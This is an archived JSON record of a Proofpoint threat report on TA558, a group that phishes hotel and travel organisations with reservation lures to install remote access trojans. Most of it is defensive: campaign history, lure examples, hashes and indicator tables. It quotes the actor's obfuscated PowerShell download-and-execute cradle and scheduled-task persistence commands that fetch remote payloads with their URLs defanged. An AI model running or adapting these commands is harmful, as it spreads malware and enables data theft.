{ "id": "78cd11d3-5eb9-45e3-9f7f-d8677a01d94d", "created_at": "2026-04-06T00:19:31.260166Z", "updated_at": "2026-04-10T03:34:00.986459Z", "deleted_at": null, "sha1_hash": "3a39a0c99f1c8759d3a2abfe8183362b5cd5b782", "title": "TA558 Threat Actor Targets Hospitality \u0026 Travel | Proofpoint US", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 913498, "plain_text": "TA558 Threat Actor Targets Hospitality \u0026 Travel | Proofpoint US\r\nBy Joe Wise, Selena Larson and the Proofpoint Threat Research Team\r\nPublished: 2022-08-16 · Archived: 2026-04-05 23:05:27 UTC\r\nKey Findings:\r\nTA558 is a likely financially motivated small crime threat actor targeting hospitality, hotel, and travel\r\norganizations.\r\nSince 2018, this group has used consistent tactics, techniques, and procedures to attempt to install a variety\r\nof malware including Loda RAT, Vjw0rm, and Revenge RAT.\r\nTA558’s targeting focus is mainly on Portuguese and Spanish speakers, typically located in the Latin\r\nAmerica region, with additional targeting observed in Western Europe and North America.\r\nTA558 increased operational tempo in 2022 to a higher average than previously observed. \r\nLike other threat actors in 2022, TA558 pivoted away from using macro-enabled documents in campaigns\r\nand adopted new tactics, techniques, and procedures. \r\nOverview\r\nSince 2018, Proofpoint has tracked a financially-motivated cybercrime actor, TA558, targeting hospitality, travel,\r\nand related industries located in Latin America and sometimes North America, and western Europe. The actor\r\nsends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed\r\nlures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments\r\nor URLs aiming to distribute one of at least 15 different malware payloads, typically remote access trojans\r\n(RATs), that can enable reconnaissance, data theft, and distribution of follow-on payloads.\r\nProofpoint tracked this actor based on a variety of email artifacts, delivery and installation techniques, command\r\nand control (C2) infrastructure, payload domains, and other infrastructure.\r\nIn 2022, Proofpoint observed an increase in activity compared to previous years. Additionally, TA558 shifted\r\ntactics and began using URLs and container files to distribute malware, likely in response to Microsoft\r\nannouncing it would begin blocking VBA macros downloaded from the internet by default. \r\nTA558 has some overlap with activity reported by Palo Alto Networks in 2018, Cisco Talos in\r\n2020 and 2021, Uptycs in 2020, and HP in 2022. This report is the first comprehensive, public report on TA558,\r\ndetailing activity conducted over four years that is still ongoing. The information used in the creation of this report\r\nis based on email campaigns, which are manually contextualized, and analyst enriched descriptions of\r\nautomatically condemned threats.\r\nCampaign Details and Activity Timeline\r\n2018\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 1 of 14\n\nProofpoint first observed TA558 in April 2018. These early campaigns typically used malicious Word attachments\r\nthat exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) or remote template URLs to download and\r\ninstall malware. Two of the most common malware payloads included Loda and Revenge RAT. Campaigns were\r\nconducted exclusively in Spanish and Portuguese and targeted the hospitality and related industries, with\r\n“reserva” (Portuguese word for “reservation”) themes. Example campaign:\r\nSubject: Corrigir data da reserva para o dia 03\r\nAttachment: Booking - Dados da Reserva.docx\r\nAttachment “Author”: C.D.T Original\r\nSHA256: 796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910\r\nFigure 1: Example TA558 email from 2018\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 2 of 14\n\nThe documents leveraged remote template URLs to download an additional RTF document, which then\r\ndownloaded and installed Revenge RAT. Interestingly, the term “CDT\" is in the document metadata and in the\r\nURL. This term, which may refer to a travel organization, appears throughout TA558 campaigns from 2018 to\r\npresent.\r\nRTF payload URL example:\r\nhxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc\r\n2019\r\nIn 2019, this actor continued to leverage emails with Word documents that exploited Equation Editor\r\nvulnerabilities (e.g. CVE-2017-11882) to download and install malware. TA558 also began using macro-laden\r\nPowerPoint attachments and template injection with Office documents. This group expanded their malware\r\narsenal to include Loda, vjw0rm, Revenge RAT, and others. In 2019, the group began occasionally expanding\r\ntargeting outside of the hospitality and tourism verticals to include business services and manufacturing. Example\r\ncampaign:\r\nSubject: RESERVA\r\nAttachment: RESERVA.docx\r\nAttachment “Author”: msword\r\nAttachment “Last Saved By”: Richard\r\nSHA256: 7dc70d023b2ee5a941edd925999bb6864343b11758c7dc18309416f2947ddb6e\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 3 of 14\n\nFigure 2: Example TA558 email from 2019\r\nFigure 3: Example TA558 Microsoft Word attachment from 2019\r\nThe documents leveraged a remote template relationship URL to download an additional RTF document. The RTF\r\ndocument (Author: obidah qudah, Operator: Richard) exploited the CVE-2017-11882 vulnerability to retrieve and\r\nexecute an MSI file. Upon execution, the MSI file extracted and ran Loda malware.\r\nIn December 2019, Proofpoint analysts observed TA558 begin to send English-language lures relating to room\r\nbookings in addition to Portuguese and Spanish.\r\n2020\r\nIn 2020, TA558 stopped using Equation Editor exploits and began distributing malicious Office documents with\r\nmacros, typically VBA macros, to download and install malware. This group continued to use a variety of\r\nmalware payloads including the addition of njRAT and Ozone RAT.  \r\nHotel, hospitality, and travel organization targeting continued. Although the actor slightly increased its English-language operational tempo throughout 2020, most of the lures featured Portuguese and Spanish reservation\r\nrequests. An example of a common attack chain in 2020:\r\nFrom: Oab Brasil \u003cfernando1540@bol[.]com[.]br\u003e\r\nSubject: Orçamento Conferencistas - 515449939\r\nAttachment: reserva.ppa\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 4 of 14\n\nSHA256: c2b817b02e56624c8ed7944e76a3896556dc2b7482f747f4be88f95e232f9207\r\nFigure 4: Example TA558 email from 2020\r\nThe message contained a PowerPoint attachment that used template injection techniques and VBA macros which,\r\nif enabled, executed a PowerShell script to download a VBS payload from an actor-controlled domain. The VBS\r\nscript in turn downloaded and executed Revenge RAT.\r\nFigure 5: 2020 attack path example\r\nTA558 was more active in 2020 than previous years and 2021, with 74 campaigns identified. 2018, 2019, and\r\n2021 had 9, 70, and 18 total campaigns, respectively. So far in 2022, Proofpoint analysts have observed 51 TA558\r\ncampaigns. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 5 of 14\n\nFigure 6: Total number of TA558 campaigns over time\r\n2021\r\nIn 2021, this actor continued to leverage emails with Office documents containing macros or Office exploits (e.g.\r\nCVE-2017-8570) to download and install malware. Its most consistently used malware payloads included vjw0rm,\r\nnjRAT, Revenge RAT, Loda, and AsyncRAT. \r\nAdditionally, this group started to include more elaborate attack chains in 2021. For example, introducing more\r\nhelper scripts and delivery mechanisms such as embedded Office documents within MSG files.\r\nIn this example 2021 campaign, emails purported to be, e.g.:\r\nFrom: Financeiro UNIMED \u003cfinanceiro@unimed-corporated[.]com\u003e\r\nSubject: Reserva\r\nReplyto: cdt[name]cdt@gmail[.]com\r\nAttachment: OficioCircularencaminhadoaoSetorFinanceiroUNIMED.docx\r\nSHA256: 2f0f99cbac828092c0ec23e12ecb44cbf53f5a671a80842a2447e6114e4f6979\r\nEmails masqueraded as Unimed, a Brazilian medical work cooperative and health insurance operator. These\r\nmessages contained Microsoft Word attachments with macros which, if enabled, invoked a series of scripts to\r\nultimately download and execute AsyncRAT. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 6 of 14\n\nFigure 7: Example TA558 email from 2021\r\nOf note is the repeat use of the string “CDT” contained the replyto email address and C2 domain names.\r\nAsyncRAT C2 domains:\r\nwarzonecdt[.]duckdns[.]org\r\ncdt2021.zapto[.]org\r\nExample PowerShell execution to download and execute AsyncRAT:\r\n$NOTHING = '(Ne\u003c^^\u003et.We'.Replace('\u003c^^\u003e','w-Object\r\nNe');$alosh='bC||||||!@!@nlo'.Replace('||||||!@!@','lient).Dow');\r\n$Dont='adString(''hxxps[:]//brasilnativopousada[.]com[.]br/Final.txt'')\r\n';$YOUTUBE=IEX ($NOTHING,$alosh,$Dont -Join '')|IEX\r\nPersistence was achieved through a scheduled task masquerading as a Spotify service.\r\nschtasks /create /sc MINUTE /mo 1 0 /tn \"Spotfy\" /tr\r\n \"\\\"%windir%\\system32\\mshta.exe\\\"hxxps[:]//www[.]unimed-corporated[.]com/microsoft.txt\" /F\r\nThis was the actor’s least active year. Proofpoint observed just 18 campaigns conducted by TA558 in 2021.\r\n2022\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 7 of 14\n\nIn 2022, campaign tempo increased significantly. Campaigns delivered a mixture of malware such as, Loda,\r\nRevenge RAT, and AsyncRAT. This actor used a variety of delivery mechanisms including URLs, RAR\r\nattachments, ISO attachments, and Office documents.\r\nTA558 followed the trend of many threat actors in 2022 and began using container files such as RAR and ISO\r\nattachments instead of macro-enabled Office documents. This is likely due to Microsoft’s announcements in late\r\n2021 and early 2022 about disabling macros by default in Office products, which caused a shift across the threat\r\nlandscape of actors adopting new filetypes to deliver payloads.\r\nAdditionally, TA558 began using URLs more frequently in 2022. TA558 conducted 27 campaigns with URLs in\r\n2022, compared to just five campaigns total from 2018 through 2021. Typically, URLs led to container files such\r\nas ISOs or zip files containing executables.\r\nFigure 8: Campaigns using specific threat types over time\r\nFor example, this 2022 Spanish language campaign featured URLs leading to container files. Messages purported\r\nto be, e.g.:\r\nFrom: Mauricio Fortunato \u003ccontato@155hotel[.]com[.]br\u003e\r\nSubject: Enc: Reserva Familiar\r\nThe URL purported to be a legitimate 155 Hotel reservation link that led to an ISO file and an embedded batch\r\nfile. The execution of the BAT file led to a PowerShell helper script that downloaded a follow-on payload,\r\nAsyncRAT.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 8 of 14\n\nSimilar to earlier campaigns, persistence was achieved via a scheduled task:\r\nschtasks /create /sc MINUTE /mo 1 /tn Turismo /F /tr\r\n\"powershell -w h -NoProfile -ExecutionPolicy Bypass -\r\nCommand start-sleep -s 20;iwr \"\"\\\"\"hxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpg\"\"\\\"\" -useB|iex;\"\r\nFigure 9: 2022 campaign example chain.\r\nIn April 2022 Proofpoint researchers spotted a divergence from the typical email lure. One of the campaigns\r\nincluded a QuickBooks invoice email lure. Additionally, this campaign included the distribution of RevengeRAT\r\nwhich had not been observed in use by TA558 since December 2020. Messages purported to be:\r\nFrom: Intuit QuickBooks Team \u003cquickbooks@unimed-corporated.com\u003e\r\nSubject: QuickBooks Invoice 1000172347\r\nAttachment: 1000172347.xlsm\r\nSHA256: b57a9f7321216c3410ebcc9d4b09e73a652dee9e750f96b2f6d7d1e39e2923d6\r\nThe emails contained Excel attachments with macros that downloaded helper scripts via PowerShell and MSHTA.\r\nThe execution of helper scripts ultimately led to the installation of RevengeRAT. Proofpoint has not seen this\r\ntheme since April, and it is unclear why TA558 temporarily pivoted away from reservations themes. \r\nMalware Use\r\nSince 2018, TA558 has used at least 15 different malware families, sometimes with overlapping command and\r\ncontrol (C2) domains. The most frequently observed payloads include Loda, Vjw0rm, AsyncRAT, and Revenge\r\nRAT.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 9 of 14\n\nFigure 10: Number of TA558 campaigns by malware type over time\r\nTypically, TA558 uses attacker owned and operated infrastructure. However, Proofpoint has observed TA558\r\nleverage compromised hotel websites to host malware payloads, thus adding legitimacy to its malware delivery\r\nand C2 traffic.  \r\nLanguage Use\r\nSince Proofpoint began tracking TA558 through 2022, over 90% of campaigns were conducted in Portuguese or\r\nSpanish, with four percent featuring multiple language lure samples in English, Spanish, or Portuguese.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 10 of 14\n\nFigure 11: Campaign totals by language since 2018\r\nInterestingly, the threat actor often switches languages in the same week. Proofpoint researchers have observed\r\nthis actor send, for example, a campaign in English and the following day another campaign in Portuguese.\r\nIndividual targeting typically differs based on campaign language.\r\nNotable Campaign Artifacts\r\nIn addition to the consistent lure themes, targeting, message content, and malware payloads, Proofpoint\r\nresearchers observed TA558 using multiple notable patterns in campaign data including the use of certain strings,\r\nnaming conventions and keywords, domains, etc. For example, the actor appears to repeat the term CDT in email\r\nand malware attributes. This may relate to the CDT Travel organization and related travel reservation lure themes.\r\nProofpoint researchers observed TA558 use the CDT term in dozens of campaigns since 2018, in C2 domains,\r\nreplyto email addresses, payload URLs, scheduled task name, and Microsoft Office document metadata (i.e.,\r\nAuthor, Last Saved By), and Microsoft Office macro language.\r\nThroughout many of the 2019 and 2020 campaigns the threat actor used various URLs from the domain\r\nsslblindado[.]com to download either helper scripts or malware payloads. Some examples include:\r\nmicrosofft[.]sslblindado[.]com\r\npassagensv[.]sslblindado[.]com\r\nsystem11[.]sslblindado[.]com\r\nLike other threat actors, this group sometimes mimics technology service names to appear legitimate. For\r\nexample, using terms in payload URLs or C2 domain names. Some examples include:\r\nmicrosofft[.]sslblindado[.]com\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 11 of 14\n\nfirefoxsystem[.]sytes[.]net\r\ngoogledrives[.]ddns[.]net\r\nAnother interesting pattern observed were common strings like “success” and “pitbull”. In several campaigns\r\nProofpoint researchers spotted these strings in C2 domains. Some examples include:\r\nsuccessfully[.]hopto[.]org\r\nsuccess20[.]hopto[.]org\r\n4success[.]zapto[.]org\r\nFrom 2019 through 2020, TA558 conducted 10 campaigns used the keyword “Maringa” or “Maaringa” in payload\r\nURLs or email senders. Maringa is a city in Brazil. Examples include:\r\nmaringareservas[.]com[.]br/seila[.]rtf\r\nmaringa[.]turismo@system11[.]com[.]br\r\nPossible Objectives\r\nProofpoint has not observed post-compromise activity from TA558. Based on the observed payloads, victimology,\r\nand campaign and message volume, Proofpoint assesses with medium to high confidence that this is a financially\r\nmotivated cybercriminal actor.\r\nThe malware used by TA558 can steal data including hotel customer user and credit card data, allow lateral\r\nmovement, and deliver follow-on payloads.\r\nOpen-source reporting provides insight into one possible threat actor objective. In July, CNN Portugal reported a\r\nPortuguese hotel’s website was compromised, and the actor was able to modify the website and direct customers\r\nto a fake reservation page. The actor stole funds from potential customers by posing as the compromised hotel.\r\nAlthough Proofpoint does not associate the identified activity with TA558, it provides an example of possible\r\nfollow-on activity and the impacts to both target organizations and their customers if an actor is able to\r\ncompromise hotel or transportation entities.\r\nConclusion\r\nTA558 is an active threat actor targeting hospitality, travel, and related industries since 2018. Activity conducted\r\nby this actor could lead to data theft of both corporate and customer data, as well as potential financial losses.\r\nOrganizations, especially those operating in targeted sectors in Latin America, North America, and Western\r\nEurope should be aware of this actor’s tactics, techniques, and procedures.\r\nIndicators of Compromise (IOCs)  \r\nThe following IOCs represent a sample of indicators observed by Proofpoint researchers associated with TA558.  \r\nC2 Domains\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 12 of 14\n\nIndicator Description Date Observed\r\nquedabesouro[.]ddns[.]net RevengeRAT C2 Domain 2018\r\nqueda212[.]duckdns[.]org njRAT/RevengeRAT C2 Domain 2018\r\n3030pp[.]hopto[.]org vjw0rm C2 Domain 2018 and 2019\r\nvemvemserver[.]duckdns[.]org Houdini/Loda C2 Domain 2019\r\n4success[.]zapto[.]org Loda C2 Domain 2019\r\nsuccess20[.]hopto[.]org Loda C2 Domain 2020\r\nmsin[.]hopto[.]org Loda C2 Domain 2021 and 2022\r\ncdtpitbull[.]hopto[.]org AsyncRAT C2 Domain 2021 and 2022\r\n111234cdt[.]ddns[.]net njRAT/AsyncRAT C2 Domain 2021 and 2022\r\ncdt2021[.]zapto[.]org AsyncRAT C2 Domain 2021 and 2022\r\n38[.]132[.]101[.]45 RevengRAT C2 IP 2022\r\nPayload URLs\r\nIndicator Description\r\nDate\r\nObserved\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 13 of 14\n\nhxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc RTF payload URL 2018 \r\nhxxp[://]hypemediardf[.]com[.]pl/css/css[.]doc Loda Payload URL 2019\r\nhxxps[:]//brasilnativopousada[.]com[.]br/Final[.]txt AsyncRAT Payload URL 2021\r\nhxxps[:]//www[.]unimed-corporated[.]com/microsoft[.]txtAsyncRAT Scheduled Task\r\nURL\r\n2021\r\nhxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpg\r\nAsyncRAT Scheduled Task\r\nURL\r\n2022\r\nET Signatures\r\nETPRO MALWARE Loda Logger CnC Activity\r\nETPRO TROJAN MSIL/Revenge-RAT Keep-Alive Activity (Outbound)\r\nETPRO TROJAN MSIL/Revenge-RAT CnC Checkin\r\nETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M2\r\nETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M4\r\nETPRO TROJAN njRAT/Bladabindi Variant CnC Activity (inf)\r\nETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)\r\nETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (inf)\r\nET TROJAN Bladabindi/njRAT CnC Command (ll)\r\nSource: https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\nPage 14 of 14\n\nAttachment SHA256: 796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910 “Author”: C.D.T Original \nFigure 1: Example TA558 email from 2018 \n Page 2 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel" ], "report_names": [ "reservations-requested-ta558-targets-hospitality-and-travel" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "316b23b5-e097-4dc6-8b1c-d096860c6c16", "created_at": "2022-10-25T16:07:24.290801Z", "updated_at": "2026-04-10T02:00:04.924688Z", "deleted_at": null, "main_name": "TA558", "aliases": [], "source_name": "ETDA:TA558", "tools": [ "AZORult", "AsyncRAT", "Bladabindi", "ExtRat", "Jorik", "Loda", "Loda RAT", "LodaRAT", "Nymeria", "PuffStealer", "Remcos", "RemcosRAT", "Remvio", "Revenge RAT", "RevengeRAT", "Revetrat", "Rultazo", "Socmer", "Vengeance Justice Worm", "Vjw0rm", "Xtreme RAT", "XtremeRAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "cf91b389-9602-45c0-8d6b-c61d14800f54", "created_at": "2023-01-06T13:46:39.448277Z", "updated_at": "2026-04-10T02:00:03.332604Z", "deleted_at": null, "main_name": "TA558", "aliases": [], "source_name": "MISPGALAXY:TA558", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434771, "ts_updated_at": 1775792040, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3a39a0c99f1c8759d3a2abfe8183362b5cd5b782.pdf", "text": "https://archive.orkl.eu/3a39a0c99f1c8759d3a2abfe8183362b5cd5b782.txt", "img": "https://archive.orkl.eu/3a39a0c99f1c8759d3a2abfe8183362b5cd5b782.jpg" } }